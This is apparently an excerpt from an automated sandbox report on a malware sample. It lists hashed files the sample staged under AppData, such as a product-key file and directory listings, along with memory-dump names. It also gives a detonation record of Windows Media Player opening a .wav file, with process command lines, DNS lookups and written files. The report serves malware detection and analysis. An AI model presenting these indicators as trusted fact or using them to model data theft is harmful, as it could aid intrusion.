C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\Apps.txt
| MD5 | b1d58554f33c991f9454f81bf1f6a7a6 |
| SHA1 | 1a9c0748fbb4c4974315f6a3188ffb5078372de1 |
| SHA256 | 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c |
| SHA512 | ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6 |
memory/3144-1260-0x00000000055A0000-0x00000000055B0000-memory.dmp
memory/3144-1263-0x0000000006FE0000-0x000000000705A000-memory.dmp
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\Directories\OneDrive.txt
| MD5 | 966247eb3ee749e21597d73c4176bd52 |
| SHA1 | 1e9e63c2872cef8f015d4b888eb9f81b00a35c79 |
| SHA256 | 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e |
| SHA512 | bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa |
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\Directories\Videos.txt
| MD5 | 1fddbf1169b6c75898b86e7e24bc7c1f |
| SHA1 | d2091060cb5191ff70eb99c0088c182e80c20f8c |
| SHA256 | a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733 |
| SHA512 | 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d |
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\Debug.txt
| MD5 | 894a0706eaf89a7b68175d7da206a8b3 |
| SHA1 | 50cb6c62493034303e4d35aef1e0c45d5dd2e102 |
| SHA256 | ce03ca4421eaf1c1b578af11d74efd3d5d4198860e209ae4929f722cf2601f18 |
| SHA512 | 1a06886bea0f2700b1a6d0d64f3d2cadf8b49ec1300b93dde40d50da2e563f9ec3ea4df446faf6462b95b375dc35a9ac8f71816eb06c96a9b7fea91817667924 |
memory/3144-1335-0x0000000007260000-0x0000000007312000-memory.dmp
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\ProductKey.txt
| MD5 | 71eb5479298c7afc6d126fa04d2a9bde |
| SHA1 | a9b3d5505cf9f84bb6c2be2acece53cb40075113 |
| SHA256 | f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3 |
| SHA512 | 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd |
memory/3144-1337-0x0000000008630000-0x0000000008984000-memory.dmp
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\msgid.dat
| MD5 | 0195e3cc8225740a42592efa8bf12f60 |
| SHA1 | d4317e1f9762572ea061de3e2639f74cd2a941be |
| SHA256 | 0aeb189d6afa7545e36f66de5c3bd66f6ee12742d77168605c78588e9eebb1db |
| SHA512 | 8681594da21e812625a02322f0996f140b28f8554ae04cf9eb79723fb2c114e6bf8b4a1c42616254dfd709d3faf15924d344bfec840dd8121e9873d7f6e45173 |
memory/3144-1349-0x00000000714D0000-0x0000000071C80000-memory.dmp
memory/3144-1350-0x00000000055A0000-0x00000000055B0000-memory.dmp
memory/3144-1351-0x00000000055A0000-0x00000000055B0000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231222-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2124 wrote to memory of 3208 | N/A | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | C:\Program Files (x86)\Windows Media Player\setup_wm.exe |
| PID 2124 wrote to memory of 3208 | N/A | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | C:\Program Files (x86)\Windows Media Player\setup_wm.exe |
| PID 2124 wrote to memory of 3208 | N/A | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | C:\Program Files (x86)\Windows Media Player\setup_wm.exe |
Processes
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Otcck.wav"
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
C:\Program Files (x86)\Windows Media Player\setup_wm.exe
"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Otcck.wav"
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | wmploc.dll | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.1.37.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.179.17.96.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tcp | |
| US | 204.79.197.200:443 | tcp | |
| US | 204.79.197.200:443 | tcp | |
| US | 204.79.197.200:443 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\wmsetup.log
| MD5 | dbbe3b2e56558f128653635d80156427 |
| SHA1 | 692dcec13ab48af5614982611af2cc048a30035f |
| SHA256 | 62ea3456f7158f1d8fa340cdcb9e7cf18f4763c66829c0aba175f6cd873e8961 |
| SHA512 | e47e76b71849f45a54b172762dcd023d6bdf03d37e3c22f33424a986863a24741352a7f021ea974cd42f15424ec6cf64dc436c16ea11f6572407bc09541c5a08 |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | 4ff06a33c8a7f9b17468a95e88f690c7 |
| SHA1 | 917f7d8e8f6ac2603a2a1b5959f44b86e7b36ebb |
| SHA256 | 615904af68bd931ffad42d2868520dfc1e5e09889bb653c272531d154dc7f6a0 |
| SHA512 | 05aff23b62a15e2efeb9f3a75301204252e766a4a8c8104f9fda086ee47e62f5e5bb7cc9595ba62721ef172250a11be16da67f4bd68a034d75ffb2dfbb061004 |
memory/1520-33-0x0000021DB49A0000-0x0000021DB49B0000-memory.dmp
memory/1520-65-0x0000021DBCE10000-0x0000021DBCE11000-memory.dmp
memory/1520-67-0x0000021DBCE40000-0x0000021DBCE41000-memory.dmp
memory/1520-69-0x0000021DBCF50000-0x0000021DBCF51000-memory.dmp
memory/1520-68-0x0000021DBCE40000-0x0000021DBCE41000-memory.dmp
memory/1520-49-0x0000021DB4AA0000-0x0000021DB4AB0000-memory.dmp